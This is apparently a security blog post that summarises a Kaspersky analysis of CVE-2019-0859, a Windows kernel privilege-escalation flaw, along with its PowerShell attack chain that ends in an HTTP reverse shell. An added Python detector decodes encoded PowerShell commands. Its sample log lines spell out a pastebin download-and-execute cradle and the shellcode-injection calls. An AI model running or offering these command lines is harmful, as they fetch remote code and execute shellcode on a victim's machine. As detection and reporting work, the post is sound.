Windows Zero-Day Exploit

Microsoft recently released a patch for a vulnerability in the Windows operating system that was being exploited in the wild and was unknown to most people until last week. The vulnerability allows an attacker who already has a foothold on the machine to escalate to full control of the system.

Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw (CVE-2019-0859) is a use-after-free issue in the Windows kernel that allows local privilege escalation (LPE). It’s being used in advanced persistent threat (APT) campaigns targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10).

Figure: win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After successful exploitation, the exploit executed PowerShell with a Base64-encoded command. The main aim of this command was to download a second-stage script from https://pastebin.com. The second-stage PowerShell script executes the final, third stage, which is also a PowerShell script.

Third stage PowerShell script

The third script is very simple and does the following:

  • Unpacks shellcode
  • Allocates executable memory
  • Copies shellcode to allocated memory
  • Calls CreateThread to execute shellcode
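
The chain described above (a Base64-encoded PowerShell command, a stager that pulls a script from pastebin.com, and a final stage that allocates executable memory and calls CreateThread) leaves a recognisable trail in process-creation logs. The following is an added example written for this summary, not code from the original post or from Securelist: it decodes the -EncodedCommand blob the way PowerShell does (Base64 over UTF-16LE) and tags each command line with the behaviours seen in this campaign. The log line format, the sample commands and the pastebin.com URL path are all constructed for the example.

```python
import base64
import binascii
import re

# Matches PowerShell's -EncodedCommand switch and its common abbreviations,
# capturing the Base64 blob that follows it.
ENCODED_SWITCH = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Indicators for the behaviours described in the post, checked against the
# decoded command text (or the plain command line when nothing is encoded).
INDICATORS = {
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I
    ),
    "pastebin": re.compile(r"pastebin\.com", re.I),
    "in_memory_execution": re.compile(
        r"virtualalloc|createthread|marshal\]::copy", re.I
    ),
}


def encode_powershell(command: str) -> str:
    """Encode a command as PowerShell expects for -EncodedCommand (UTF-16LE, Base64).
    Used here only to build realistic sample log lines."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return (found, text). found is False when no -enc switch is present;
    text is None when the switch is present but the blob does not decode."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return False, None
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return True, raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return True, None


def classify(cmdline: str) -> list:
    """Tag one PowerShell command line with the indicators it matches (sorted)."""
    found, decoded = decode_encoded_command(cmdline)
    if found and decoded is None:
        # An encoded switch that will not decode is itself worth an alert.
        return ["undecodable_encodedcommand"]
    tags = ["encoded_command"] if found else []
    text = decoded if decoded is not None else cmdline
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            tags.append(name)
    return sorted(tags)


def scan_logs(lines):
    """Parse constructed '<pid> <parent> -> <command line>' records and classify each."""
    results = []
    for line in lines:
        header, _, cmdline = line.partition(" -> ")
        pid = header.split()[0]
        results.append((pid, classify(cmdline)))
    return results


# Constructed sample process-creation records (not taken from the original post).
SAMPLE_LOGS = [
    "1001 explorer.exe -> powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp",
    # Stage 1: hidden window, encoded download cradle pointing at a placeholder paste.
    "2002 svchost.exe -> powershell.exe -NoP -W Hidden -Enc " + encode_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"
    ),
    # Stage 3 shape: executable allocation, copy, CreateThread (signature text only).
    "3003 powershell.exe -> powershell.exe -enc " + encode_powershell(
        "$a=[Win32]::VirtualAlloc(0,$sc.Length,0x3000,0x40);"
        "[Runtime.InteropServices.Marshal]::Copy($sc,0,$a,$sc.Length);"
        "[Win32]::CreateThread(0,0,$a,0,0,0)"
    ),
    # Malformed blob: decodes to an odd byte count, which is not valid UTF-16LE.
    "4004 cmd.exe -> powershell.exe -EncodedCommand QUJD",
]

if __name__ == "__main__":
    for pid, tags in scan_logs(SAMPLE_LOGS):
        print(pid, tags or ["clean"])
```

Decoding the blob before matching is the point: the pastebin.com string and the VirtualAlloc/CreateThread calls never appear in the raw command line of an encoded invocation, so a rule that only greps the command line misses both stages.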

Shellcode from PowerShell script

The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.

Thankfully, an update for this vulnerability is available from the Microsoft website.

Details provided by SecureList.

Patrick Domingues
